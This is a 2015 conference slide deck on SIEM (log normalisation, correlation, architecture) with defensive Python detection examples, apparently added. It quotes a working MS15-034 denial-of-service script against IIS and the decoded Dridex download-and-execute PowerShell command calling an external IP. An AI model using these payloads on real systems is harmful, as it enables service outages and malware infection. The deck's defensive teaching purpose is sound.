2015 Security Conference
Security Information and Event Management (SIEM)
Paul Dutot IEng MIET MBCS CITP QSTM OSCP
Who Am I
• Head of Penetration Testing and SIEM within Security Department @ Logicalis Jersey.
• Tiger Scheme accredited Penetration Tester.
• Certified in McAfee ESM and Vulnerability Manager.
• My role is a mix of ethical hacking and using those skills to provide Managed SIEM to our clients.
• Founder member of the CIISF and secretary of the Jersey BCS branch.
• Incorporated Engineer (IEng) / Chartered IT Professional (CITP).
Our clients
• Managed SIEM Incident Response – World Wide Engineering Company in 68 countries.
• Managed SIEM – Fortune 100 American Financial Business – 23,000 IPs in 26 countries.
• Managed SIEM for SMBs – ranging from customers with 2 firewalls to 30 devices under management.
And everything in between…
All managed by staff at Logicalis in Jersey.
What we shall talk about…
• SIEM Concepts
• What is SIEM. What does it solve?
• Meet the Dridex Malware
• Questions
• SIEM Architectures
• SIEM Features At A Glance
• Business Risks – Where are the threats?
Business Risks – Risks by Category
(Chart: risks by category, 2014 vs 2015.)
Source: Verizon Data Breach report
Business Risks – Incident Categorization by Industry Sector
Source: Verizon Data Breach report
MS15-034 – How Fast the Bad Guys Move…
From Microsoft's patch for MS15-034 to a reverse-engineered exploit for sale on the Darknet: less than 6 days.
<script>
/*
Name: IISer.htm
Description: Crashes a Windows IIS host vulnerable to MS15-034
Author: Malik Mesellem (@MME_IT)
*/
// Variables
var ip = "10.0.1.1";
var file = "welcome.png"; // For W2K8R2
// var file = "iis-85.png"; // For W2K12R2
var payload = "bytes=18-18446744073709551615";
// Tested on W2K8R2 and W2K12R2
var xmlhttp = new XMLHttpRequest();
// Sends the HTTP request 10 times
for (var i = 0; i < 10; i++) {
    xmlhttp.open("GET", "http://" + ip + "/" + file, true);
    xmlhttp.setRequestHeader("Range", payload);
    xmlhttp.send();
}
alert("Bye bye IIS!");
</script>
http://pastebin.com/SbN55M2H
Business Risks – Final Thoughts
“90% of all incidents is people. Whether it’s goofing up, getting infected, behaving badly or losing stuff, most incidents fall into the PEBKAC (Problem Exists Between Keyboard and Chair) and ID-10T (idiot) uber patterns.”
“Financial Motivation is also alive and well in phishing attacks. The old method of duping people into providing their personal identification number or bank information is still around but the targets are largely individuals versus organizations. Phishing with the intent of device compromise is certainly present.”
Source: Verizon Data Breach report
Since October 2014, Jersey and Guernsey companies across all sectors have been targeted by the ‘Dridex’ malware through email phishing.
What is SIEM? What issues does it solve?
SIEM is the Evolution and Integration of Two Distinct Technologies:
• Security Event Management (SEM) – primarily focused on collecting and aggregating security events.
• Security Information Management (SIM) – primarily focused on the enrichment, normalization and correlation of security events.
Security Information & Event Management (SIEM) is a set of technologies for:
• Log Data Collection
• Correlation
• Aggregation
• Normalization
• Retention
• Analysis and Workflow
Three Major Factors Driving the Majority of SIEM Implementations:
1. Real-Time Threat Visibility
2. Security Operational Efficiency
3. Compliance and/or Log Management Requirements
SIEM Concepts – Visibility Problem
FACT: A small network with 20 desktops will produce an average of 46 events per second (EPS) = 165,600 per hour = 3,974,400 per day. Bursts of events are 1.5 times this figure.
Do you fancy trying to investigate that many events for a security issue?
SIEM Concepts – Compliance Problem
PCI-DSS Compliance is one of the main drivers for a SIEM solution.
Meeting Section 10 – Logging Requirements is almost impossible without a SIEM!
There are at least 20 use cases for using SIEM to meet aspects of PCI-DSS – see http://resources.infosecinstitute.com/siem-use-cases-pci-dss-3-0-part-1/
SIEM Concepts – Anatomy of an Event / Flow Life
Raw Logs / Flows, for example a Cisco ASA firewall deny:
<164>Apr 15 2015 10:04:53: %ASA-4-106023: Deny tcp src InsideLAN:192.168.4.35/50381 dst Outside:216.41.215.186/80 by access-group "inside_in" [0x0, 0x0]
Life of an event:
1. Raw logs stored and forensically tagged (raw logs are kept in their raw format).
2. Raw logs are normalised.
3. Log processed by the Correlation Engine.
4. Security Alert!!
• Events come from devices such as workstations, routers, AD servers and security devices.
• Flows come from flow collectors or flow-enabled devices such as firewalls.
• Lots of different flow types supported, such as NetFlow / QFlow.
• Lots of different device types and logging options.
Normalisation = the process of getting different record formats from different devices into a common format.
SIEM solutions are sized primarily by capacity in terms of Events Per Second (EPS).
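To make the normalisation step concrete, here is an added example (not McAfee ESM code; the output field names are my own, not a vendor schema) that parses the ASA 106023 deny line above into a common record and tags the raw line with a SHA-256 hash so the stored raw copy can be tied to the normalised one:

```python
"""Normalise Cisco ASA 'Deny' syslog messages (message id 106023) into a common record."""
import hashlib
import re
from datetime import datetime
from typing import Dict, List, Optional

# Syslog PRI = facility * 8 + severity, so <164> is local4 (20) / warning (4).
SYSLOG_SEVERITY = ["emerg", "alert", "crit", "err", "warning", "notice", "info", "debug"]

# Pattern for %ASA-4-106023. Group names are my own normalised field names.
ASA_DENY = re.compile(
    r"^<(?P<pri>\d{1,3})>(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{4} \d{2}:\d{2}:\d{2}): "
    r"%ASA-(?P<asa_sev>\d)-(?P<msgid>\d{6}): Deny (?P<proto>\w+) src "
    r"(?P<src_zone>[^:\s]+):(?P<src_ip>[\d.]+)/(?P<src_port>\d+) dst "
    r"(?P<dst_zone>[^:\s]+):(?P<dst_ip>[\d.]+)/(?P<dst_port>\d+) by "
    r'access-group "(?P<acl>[^"]+)"'
)


def normalise(line: str) -> Optional[Dict[str, object]]:
    """Return a normalised event dict, or None if the line is not an ASA 106023 deny."""
    raw = line.strip()
    m = ASA_DENY.match(raw)
    if not m:
        return None
    pri = int(m.group("pri"))
    return {
        "timestamp": datetime.strptime(m.group("ts"), "%b %d %Y %H:%M:%S"),
        "facility": pri // 8,
        "severity": SYSLOG_SEVERITY[pri % 8],
        "device_type": "cisco_asa",
        "message_id": m.group("msgid"),
        "action": "deny",
        "protocol": m.group("proto").lower(),
        "src_zone": m.group("src_zone"),
        "src_ip": m.group("src_ip"),
        "src_port": int(m.group("src_port")),
        "dst_zone": m.group("dst_zone"),
        "dst_ip": m.group("dst_ip"),
        "dst_port": int(m.group("dst_port")),
        "rule": m.group("acl"),
        # Forensic tag: hash of the untouched raw line, so the stored raw log
        # and the normalised record can be matched up later.
        "raw_sha256": hashlib.sha256(raw.encode("utf-8")).hexdigest(),
    }


# Constructed sample input: the ASA line from the slide, a second deny with a
# documentation address, and an unrelated ASA message that must be skipped.
SAMPLE_LOGS: List[str] = [
    '<164>Apr 15 2015 10:04:53: %ASA-4-106023: Deny tcp src InsideLAN:192.168.4.35/50381 '
    'dst Outside:216.41.215.186/80 by access-group "inside_in" [0x0, 0x0]',
    '<164>Apr 15 2015 10:05:01: %ASA-4-106023: Deny udp src InsideLAN:192.168.4.77/53412 '
    'dst Outside:198.51.100.9/53 by access-group "inside_in" [0x0, 0x0]',
    '<166>Apr 15 2015 10:05:02: %ASA-6-302013: Built outbound TCP connection 12345 (not a deny)',
]


def normalise_all(lines: List[str]) -> List[Dict[str, object]]:
    """Normalise every line that matches, silently dropping the rest."""
    return [ev for ev in (normalise(line) for line in lines) if ev is not None]
```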
SIEM Concepts – Correlation
• Correlation is the process of looking at events to determine their relevance and relationships to other events within the network, for example a successful login after a brute force.
• It can be applied in real-time and historical modes with a variety of rule types.
• 175+ correlation rules enabled by default.
• Correlation enables us to gain visibility into other non-traditional IT systems such as Access Control and BMS.
• Correlation rules combined with Watch Lists allow us to track security incidents, such as a malware infection, in real time.
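The "successful login after brute force" rule named above, as an added example (not McAfee ESM rule syntax; the Event fields and the threshold and window values are my own): it replays normalised login events, fires when a source reaches the failure threshold inside the window and then succeeds, and puts that source on a watch list.

```python
"""Correlation rule: successful login after a brute force, with a watch list."""
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, List, NamedTuple, Set, Tuple


class Event(NamedTuple):
    ts: datetime
    src_ip: str
    user: str
    outcome: str  # "fail" or "success"


class Alert(NamedTuple):
    ts: datetime
    src_ip: str
    user: str
    failures: int


def correlate(events: List[Event], threshold: int = 5,
              window: timedelta = timedelta(minutes=10)) -> Tuple[List[Alert], Set[str]]:
    """Replay events in time order. Fire when a source has at least `threshold`
    failed logins inside `window` and then logs in successfully; the source is
    then added to a watch list so its later activity can be tracked."""
    recent_failures: Dict[str, Deque[datetime]] = defaultdict(deque)
    alerts: List[Alert] = []
    watch_list: Set[str] = set()
    for ev in sorted(events, key=lambda e: e.ts):
        q = recent_failures[ev.src_ip]
        while q and ev.ts - q[0] > window:  # age out failures outside the window
            q.popleft()
        if ev.outcome == "fail":
            q.append(ev.ts)
        elif ev.outcome == "success":
            if len(q) >= threshold:
                alerts.append(Alert(ev.ts, ev.src_ip, ev.user, len(q)))
                watch_list.add(ev.src_ip)
            q.clear()  # one alert per burst, not one per later success
    return alerts, watch_list


# Constructed sample events (RFC 1918 addresses, fictitious users).
T0 = datetime(2015, 4, 15, 10, 0, 0)
SAMPLE_EVENTS: List[Event] = (
    # Five old failures from 10.0.0.7, all outside the window by the time it succeeds.
    [Event(T0 - timedelta(minutes=40 - i), "10.0.0.7", "bob", "fail") for i in range(5)]
    + [Event(T0, "10.0.0.7", "bob", "success")]
    # Six failures in six minutes, then a success: the brute-force pattern.
    + [Event(T0 + timedelta(minutes=i), "10.0.0.5", "jsmith", "fail") for i in range(6)]
    + [Event(T0 + timedelta(minutes=6), "10.0.0.5", "jsmith", "success")]
    # Two typos then a success: below threshold, no alert.
    + [Event(T0 + timedelta(minutes=7, seconds=s), "10.0.0.9", "anne", "fail") for s in (0, 20)]
    + [Event(T0 + timedelta(minutes=8), "10.0.0.9", "anne", "success")]
)


def run_sample() -> Tuple[List[Alert], Set[str]]:
    """Run the rule over the constructed events."""
    return correlate(SAMPLE_EVENTS)
```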
SIEM Architecture – ESM / REC / ELM
(Diagram: log sources – Servers, Wireless Access Points, Main Office, VPN Endpoints, IDS / IPS, Switches / Routers, Linux, Desktops – feeding a Receiver, with the ESM and ELM behind it.)
• Events / Flows arrive at the Receiver.
• Raw logs are tagged and stored in the Enterprise Log Manager (ELM).
• Normalisation and Correlation take place in the Enterprise Security Manager (ESM).
• Log collection can be in various formats (Syslog / SDEE for example).
• Desktop collection can be agent based, such as OSSEC HIDS, or agentless, e.g. WMI.
• Solution can be ‘Cloud’ or ‘On Premise’ or a ‘Hybrid’ with high availability.
SIEM Features – At A Glance
• Powerful Investigation of Events – find what is important in 3 clicks.
• Case Management of Incidents.
• Automate responses to Incidents.
• API to Interrogate / Update SIEM.
• Anomaly Behaviour Detection.
• Custom Dashboards and Powerful Reporting.
• Zone Management.
• Integration with Threat Intelligence Feeds – Public and Private.
• Data Enrichment allows us to further augment log content.
Why use a Logicalis Managed SIEM solution?
• Expertise – Logicalis Jersey is the World Wide security centre of excellence for Logicalis Group.
• Cost.
• Flexible consumption models.
• Strategic Partners.
• ISO27001 Certified.
• Redundant Data Centres in Jersey and Guernsey resolving jurisdictional data issues.
• Our multi-tenanted solution ensures data segregation at all levels.
Meet Dridex – Banking Malware
It has code hidden in an Excel spreadsheet: a VBA macro virus with a hidden URL. When decoded it becomes…
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.63/kwefewef/fgdsee/dxzq.jpg','%TEMP%JIOiodfhioIH.cab'); expand %TEMP%JIOiodfhioIH.cab %TEMP%JIOiodfhioIH.exe; start %TEMP%JIOiodfhioIH.exe;
Feb 2015: Only 3 out of 57 AV Engines detected it.
Apr 2015: 39 out of 55.
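Because AV caught so little of it, the decoded command line itself is the thing to detect. Here is an added detection example (not from the slides or any vendor; indicator names, thresholds and the sample command lines are my own, with a placeholder host in place of the real one) that scores process command-line telemetry, such as process-creation events fed into the SIEM, for the download-to-%TEMP%, expand, start chain shown above:

```python
"""Flag command lines matching the Dridex downloader chain: PowerShell WebClient
download to %TEMP%, expand of a .cab, then start of the dropped .exe."""
import re
from typing import Dict, List

# (indicator name, pattern). A single hit is normal admin activity; the chain is not.
INDICATORS = [
    ("cmd_wrapper", re.compile(r"\bcmd(\.exe)?\s+/[kc]\b", re.I)),
    ("powershell_launch", re.compile(r"\bpowershell(\.exe)?\b", re.I)),
    ("webclient_download", re.compile(r"New-Object\s+System\.Net\.WebClient.*?\.DownloadFile\(", re.I)),
    ("temp_drop", re.compile(r"%TEMP%|\$env:TEMP|\\Temp\\", re.I)),
    ("disguised_payload", re.compile(r"https?://[^\s'\"]+\.(jpg|png|gif|txt)\b", re.I)),
    ("cab_expand", re.compile(r"\bexpand\s+\S+\.cab\b", re.I)),
    ("execute_dropped", re.compile(r"\bstart\s+\S+\.exe\b", re.I)),
]


def match_indicators(cmdline: str) -> List[str]:
    """Names of every indicator present in the command line."""
    return [name for name, rx in INDICATORS if rx.search(cmdline)]


def is_suspicious(cmdline: str, min_hits: int = 4) -> bool:
    """Alert only when a remote download and execution of what was dropped
    co-occur, with enough supporting indicators to cut admin-script noise."""
    hits = set(match_indicators(cmdline))
    downloads = "webclient_download" in hits
    executes = bool(hits & {"cab_expand", "execute_dropped"})
    return downloads and executes and len(hits) >= min_hits


# Constructed sample command lines. The first mirrors the slide's structure with a
# placeholder host and file name; the rest are ordinary administrative activity.
SAMPLES: Dict[str, str] = {
    "dridex_like": (
        "cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile("
        "'http://PLACEHOLDER.invalid/a/b/c.jpg','%TEMP%dropper.cab'); "
        "expand %TEMP%dropper.cab %TEMP%dropper.exe; start %TEMP%dropper.exe;"
    ),
    "admin_script": "powershell.exe -File C:\\scripts\\backup.ps1 -Verbose",
    "driver_unpack": "expand C:\\Windows\\Temp\\driver.cab C:\\drivers\\driver.inf",
    "download_only": (
        "powershell.exe (New-Object System.Net.WebClient).DownloadFile("
        "'https://intranet.example/tool.zip','C:\\tools\\tool.zip')"
    ),
}


def triage(samples: Dict[str, str] = SAMPLES) -> Dict[str, bool]:
    """Map each sample name to whether the rule would alert on it."""
    return {name: is_suspicious(cmd) for name, cmd in samples.items()}
```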
ACME Trust – Anatomy of a Compromise
(Diagram: Dridex C2 Server, Operator, File Server, AD Domain Server, Database Server, Higher Level Hacker.)
• Malware installs a Key Logger and a Remote Access Trojan (RAT).
• Access sold to a higher level hacker. The hacker uses the credentials obtained via the key logger to upload Trojan versions / documents to the file server.
• Database Server credentials are obtained and the Database Server is compromised. Data exfiltration begins…
• Eventually AD compromised = network compromised. You could find out like this…
Real Reputational Damage
http://dpaste.dzfl.pl/866433ffd07a
Demo Time
Bypassing Anti Virus using Windows PowerShell in Excel
One for the Defenders
Hunting Malware with SysInternals Suite
Video: https://www.youtube.com/watch?v=Wuy_Pm3KaV8
PowerPoint: video.ch9.ms/sessions/teched/na/2014/DCIM-B368.pptx
“When combining the results from all four AV engines, less than 40% of the binaries were detected.”
Source: CAMP: Content-Agnostic Malware Protection, Proceedings of the 20th Annual Network & Distributed System Security Symposium
Thank You
Questions

Logicalis Security Conference
